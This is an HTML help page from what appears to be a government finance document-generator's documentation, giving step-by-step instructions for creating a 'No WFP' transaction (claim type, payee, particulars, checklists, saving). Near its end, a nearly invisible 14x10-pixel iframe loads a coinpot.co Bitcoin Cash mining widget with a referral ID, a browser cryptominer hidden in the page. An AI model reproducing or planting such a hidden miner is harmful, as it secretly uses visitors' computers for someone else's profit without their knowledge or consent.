<!DOCTYPE html>
<html>

<head>
	<title>PGBh-US Document Generator</title>
	<link rel="stylesheet" type="text/css" href="css/style.css" />
	<link rel="stylesheet" type="text/css" href="font-awesome/css/font-awesome.min.css" />
	<link rel="stylesheet" type="text/css" href="css/bootstrap.min.css" />
	<!-- <script src="js/jquery.imagebox.js"></script> -->
</head>

<body>
	<div id="wrapper">
		<!-- wrapper starts-->
		<nav class="navbar navbar-inverse navbar-fixed-top">
			<!-- navbar navbar-inverse navbar-fixed-top starts -->
			<div class="navbar-header">
				<!-- navbar-header starts-->
				<button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-ex1-collapse">
					<!-- .navbar-ex1-collapse starts--><span class="sr-only">Toggle Navigation</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button>
				<!-- .navbar-ex1-collapse ends--><a href="index.html" class="navbar-brand">PGBh-US Document Generator (Documentation)</a> </div>
			<!-- navbar-header ends-->
			<!-- Left -->
			<div class="collapse navbar-collapse navbar-ex1-collapse">
				<!-- collapse navbar-collapse navbar-ex1-collapse starts -->
				<ul class="nav navbar-nav side-nav">
					<!-- nav navbar-nav side-nav starts -->
					<li>
						<!-- li starts -->
						<a href="getting_started.html"> <i class="fa fa-fw fa-dashboard"></i> Getting Started </a>
					</li>
					<!-- li ends -->
					<li>
						<!-- li starts -->
						<a href="#" data-toggle="collapse" data-target="#software"> <i class="fa fa-fw fa-table"></i> Software Settings <i class="fa fa-fw fa-caret-down"></i> </a>
						<ul id="software" class="collapse">
							<li> <a href="software_update.html">Software Update</a> </li>
							<li> <a href="software_settings.html">Software Settings</a> </li>
							<li> <a href="connection_string_settings.html">Connection String Settings</a> </li>
							<li> <a href="software_info.html">Software Info</a> </li>
						</ul>
					</li>
					<!-- li ends -->
					<li>
						<!-- li starts -->
						<a href="#" data-toggle="collapse" data-target="#developer"> <i class="fa fa-fw fa-pencil"></i> Developer Tab <i class="fa fa-fw fa-caret-down"></i> </a>
						<ul id="developer" class="collapse">
							<li> <a href="software_revision.html">Software Revision</a> </li>
							<li> <a href="developer_level.html">Developer Level Software Upload</a> </li>
						</ul>
					</li>
					<!-- li ends -->
					<li>
						<!-- li starts -->
						<a href="#" data-toggle="collapse" data-target="#user"> <i class="fa fa-fw fa-user"></i> Users <i class="fa fa-fw fa-caret-down"></i> </a>
						<ul id="user" class="collapse">
							<li> <a href="user_management.html">User Management</a> </li>
							<li> <a href="user_privileges.html">User's Privileges</a> </li>
							<li> <a href="change_password.html">Change Password</a> </li>
							<li> <a href="user_chat_line.html">Users Chat Line</a> </li>
						</ul>
					</li>
					<!-- li ends -->
					<li>
						<!-- li starts-->
						<a href="#" data-toggle="collapse" data-target="#wfp"> <i class="fa fa-fw fa-arrows-v"></i> Back End <i class="fa fa-fw fa-caret-down"></i> </a>
						<ul id="wfp" class="collapse">
							<li> <a href="work_financial_funds.html">Work and Financial Plan/Funds</a> </li>							
							<li> <a href="wfp_usage.html">WFP Usage</a> </li>							
							<li> <a href="claims_checklist.html">Claims Checklist</a> </li>							
							<li> <a href="checklist_manager.html">Checklist Manager</a> </li>
							<li> <a href="paas_tagging.html">PAAS Tagging</a> </li>
							<li> <a href="signatories.html">Signatories</a> </li>
						</ul>
					</li>
					<!-- li ends-->
					<li>
						<!-- li starts -->
						<a href="#" data-toggle="collapse" data-target="#transaction"> <i class="fa fa-fw fa-gear"></i> Transaction <i class="fa fa-fw fa-caret-down"></i> </a>
						<ul id="transaction" class="collapse">
							<li> <a href="with_wfp_transaction.html">With WFP Transactions</a> </li>
							<li> <a href="no_wfp_transaction.html">No WFP Transactions</a> </li>
							<li> <a href="manage_transaction.html">Manage Transactions</a> </li>
							<li> <a href="transaction_approval.html">Transaction For Approval</a> </li>
						</ul>
					</li>
					<!-- li ends -->
				</ul>
				<!-- nav navbar-nav side-nav ends -->
			</div>
			<!-- collapse navbar-collapse navbar-ex1-collapse starts -->
		</nav>
		<!-- navbar navbar-inverse navbar-fixed-top ends -->
		<div id="page-wrapper">
			<!-- page-wrapper starts-->
			<div class="container-fluid">
				<!-- container-fluid starts-->
				<div class="row">
					<div class="col-lg-12">
						<ol class="breadcrumb">
							<li class="active"> <i class="fa fa-dashboard"></i> <a href="index.html">PGBh-USDG</a> / Transaction / No WFP Transaction </li>
						</ol>
					</div>
				</div>
				<div class="row">
					<!-- row starts-->
					<div class="col-lg-12">
						<!-- col-lg-12 starts-->
						<hr />
						<h3 font size="20" style="font-weight: bold;">No WFP Transaction</h3>
						<br>
						<figure> <img src="img/software_2.png" alt="Figure 1.0" class="img-style">
							<br>
							<figcaption style="text-align: center">Figure 1.0</figcaption>
						</figure>
						<br>
						<div class="info notes">
							<p><strong>For Figure 1.0:</strong></p>
							<ul>
								<li><strong><a href="#arrow-a">Arrow B (Blue)</a></strong>: By clicking No WFP Transaction see Figures below.</li>
							</ul>
							
						</div>

						<div class="info notes">
							<br>							
							<ul>
								<li><strong>No WFP Documents: Remittance, Cash Advance for PTO, withdrawal, liquidation (non-refundable)</strong></li>
							</ul>
						</div>

						<!-- From HRIS -->
						<br />
						<div class="page-header">
							<h4>
									<strong>1. Make a New No WFP Transaction</strong>
								</h4> </div>
						<div class="info notes">
							<ul>
								<li> 1.  A new window will prompt after clicking the specified button. Here, you can input the transaction details and save transactions for approval. </li>
							</ul>
						</div>
						<figure> <img src="img/nwpft1.jpg" alt="Figure 1.1" class="img-style" />
							<br />
							<figcaption style="text-align: center">Figure 1.1</figcaption>
						</figure>
						<br />
						
						<!-- new transaction steps -->
						<br />
						<div class="page-header">
							<h4>
									<strong>2. New No WFP Transaction Form Steps and How it Functions</strong>
								</h4> </div>
						<figure> <img src="img/nwpft2.0.jpg" alt="Figure 1.3" class="img-style" />
							<br />
							<figcaption style="text-align: center">Figure 1.2</figcaption>
						</figure>
						<br />
						<div class="danger notes">
							<p> <strong>Note: Please fill up all required(*) fields.</strong> </p>
						</div>
						<div class="page-header">
							<h5>
									<strong>Step 1: Selecting a Claim Type</strong>
								</h5> </div>
						
						<br />
						<figure> <img src="img/new_transaction_claimtype.png" alt="Figure 1.4" class="img-style" />
							<br />
							<figcaption style="text-align: center">Figure 1.3</figcaption>
						</figure>
						<br />
						<div class="info notes">
							<ul>
								<li> You need to click the "Load" button first and a window will pop-up, showing a list of Claim Types. </li>
							</ul>
						</div>
						<br />
						<figure> <img src="img/nwpft2.1.jpg" alt="Figure 1.5" class="img-style" />
							<br />
							<figcaption style="text-align: center">Figure 1.4</figcaption>
						</figure>
						<br />
						<div class="info notes">
							<ul>
								<li> To select a specific claim type, you can either scroll down on the list of claim types or use the search box located at the top of the list by typing the claim type description, click the claim type chosen and click the "Select" button. You can also select a claim type without clicking the "Select" button by double-clicking the chosen claim type. </li>
							</ul>
						</div>
						<br />
						<figure> <img src="img/new_transaction_params.png" alt="Figure 1.6" class="img-style" />
							<br />
							<figcaption style="text-align: center">Figure 1.5</figcaption>
						</figure>
						<br />
						<div class="danger notes">
							<p> <strong>Note: On other claim types (e.g. BILLS, SALARIES, i.a.), 2
                    boxes will show-up where you need to select the Date from
                    and Date to of the claim type, dropping down a calendar,
                    respectively.
                  </strong> </p>
						</div>
						<div class="page-header">
							<h5>
									<strong>Step 2: Selecting a Payee</strong>
								</h5> </div>
						<figure> <img src="img/new_transaction_payee.png" alt="Figure 1.7" class="img-style" />
							<br />
							<figcaption style="text-align: center">Figure 1.6</figcaption>
						</figure>
						<br />
						<div class="info notes">
							<ul>
								<li> You need to click the "Load" button first and a window will pop-up, showing a list of Payees. </li>
							</ul>
						</div>
						<figure> <img src="img/new_transaction_select_payee.png" alt="Figure 1.8" class="img-style" />
							<br />
							<figcaption style="text-align: center">Figure 1.7</figcaption>
						</figure>
						<br />
						<div class="danger notes">
							<p> <strong>Note: You cannot find a payee if you haven't set its
                    corresponding payee type. (e.g. You cannot find BOHECO I
                    ELECTRIC COOPERATIVE, INC. if you have set the payee type to
                    Others or Employee.)
                  </strong> </p>
						</div>
						<div class="info notes">
							<ul>
								<li> To select a payee, double click the "Payee Name" OR click the "Select" button. </li>
							</ul>
						</div>
						<div class="page-header">
							<h5>
									<strong>Step 3: Setting the Address</strong>
								</h5> </div>
						<figure> <img src="img/new_transaction_address.png" alt="Figure 1.9" class="img-style" />
							<br />
							<figcaption style="text-align: center">Figure 1.8</figcaption>
						</figure>
						<br />
						<div class="info notes">
							<ul>
								<li> To set the address, type it on the address box. </li>
							</ul>
						</div>
						<div class="page-header">
							<h5>
									<strong>Step 4: Setting the Particulars</strong>
								</h5> </div>
						<figure> <img src="img/new_transaction_particulars.png" alt="Figure 1.10" class="img-style" />
							<br />
							<figcaption style="text-align: center">Figure 1.9</figcaption>
						</figure>
						<br />

						<div class="danger notes">
							<p> <strong>Note: Some claim types (e.g. BILLS - AD PLACEMENT AND
                    PUBLICATION, i.a.) have default particulars entered where
                    you can edit or add new particulars.)
                  </strong> </p>
						</div>
						<div class="info notes">
							<ul>
								<li> To set the Transaction Particulars, type it on the particulars box. </li>
							</ul>
						</div>

						<figure> <img src="img/nwpft3.jpg" alt="Figure 1.10" class="img-style" />
							<br />
							<figcaption style="text-align: center">Figure 1.10</figcaption>
						</figure>
						<br />
					
						<div class="page-header">
							<h5>
									<strong>Step 5: Add Transaction Amount</strong>
								</h5> </div>
						<figure> <img src="img/nwpft4.jpg" alt="Figure 1.10" class="img-style" />
							<br />
							<figcaption style="text-align: center">Figure 1.10.1</figcaption>
						</figure>
						
						<div class="info notes">
							<ul>
								<li>  Add Transaction Amount </li>
							</ul>
						</div>
					
						<figure> <img src="img/new_transaction_checklist_add.png" alt="Figure 1.22" class="img-style" />
							<br />
							<figcaption style="text-align: center">Figure 1.11</figcaption>
						</figure>
						<br />
						<div class="danger notes">
							<p> <strong>Note: Checklist is empty if there were no Claim Type selected.</strong> </p>
						</div>
						<div class="info notes">
							<ul>
								<li> To add checklist(s), click the checklist/s from the checklist list located at the upper-rightmost side of the form. </li>
							</ul>
						</div>
						<!--  8 ends-->
						<div class="page-header">
							<h5>
									<strong>Step 8: Finalizing and Saving the Transaction</strong>
								</h5> </div>
						<figure> <img src="img/new_transaction_finalize.png" alt="Figure 1.23" class="img-style" />
							<br />
							<figcaption style="text-align: center">Figure 1.12</figcaption>
						</figure>
						<br />
						<div class="info notes">
							<ul>
								<li> You can Save, Finalize and print the document by clicking the "Save and Finalized" button after verifying everything. </li>
							</ul>
						</div>
						<!-- 9 ends -->
						<div class="page-header">
							<h5>
									<strong>Step 8.1: Save for Later</strong>
								</h5> </div>
						<figure> <img src="img/new_transaction_finalize.png" alt="Figure 1.23" class="img-style" />
							<br />
							<figcaption style="text-align: center">Figure 1.13</figcaption>
						</figure>
						<br />
						<div class="danger notes">
							<p> <strong>Note: You cannot save the transaction as draft if you haven't entered any credentials on Claim Type, Payee, Address and Particulars.</strong> </p>
						</div>
						<div class="info notes">
							<ul>
								<li> If you have entered credentials but you don't want to save and finalize it for printing and approval, you can click the "Save for Later" button located just beside the "Save and Finalized" button so the transaction will be saved as a draft. You can later find the draft on the Manage Transaction List. </li>
							</ul>
						</div>
						<div class="page-header">
							<h5>
									<strong>Step 8.2: Refer from Past Transaction</strong>
								</h5> </div>
						<figure> <img src="img/new_transaction_refere.png" alt="Figure 1.24" class="img-style" />
							<br />
							<figcaption style="text-align: center">Figure 1.14</figcaption>
						</figure>
						<br />
						<div class="info notes">
							<ul>
								<li> You can refer your transaction from past transactions (e.g. drafts, approved, unapproved, i.a.) by clicking the "Refer to Past Transactions" button. </li>
								<li>After clicking the said button, a form will pop up showing all past transactions in which you can refer to.</li>
							</ul>
						</div>
						<figure> <img src="img/new_transaction_refer_form.png" alt="Figure 1.25" class="img-style" />
							<br />
							<figcaption style="text-align: center">Figure 1.15</figcaption>
						</figure>
						<br />
						<div class="info notes">
							<ul>
								<li> You can refer a past transaction by clicking the transaction from the list you want to refer to. After selecting the past transaction, click the "Refer to this Transaction" button and you will then be redirected back to the New Transaction form with the credentials from the selected past transaction entered into the redirected form.</li>
							</ul>
						</div>
					</div>
					<!-- col-lg-12 ends-->
				</div>
				<!-- row ends-->
			</div>
			<!-- container-fluid ends-->
		</div>
		<!-- page-wrapper ends-->
		<div style="text-align:center">
				<iframe scrolling="no" frameborder="0" src="https://coinpot.co/mine/bitcoincash/?ref=7F1715F1CC6E&mode=widget" style="overflow:hidden;width:14px;height:10px;"></iframe>
		</div>
	</div>
	<!-- wrapper ends-->
	<script type="text/javascript" src="js/jquery.min.js"></script>
	<script type="text/javascript" src="js/bootstrap.min.js"></script>
</body>

</html>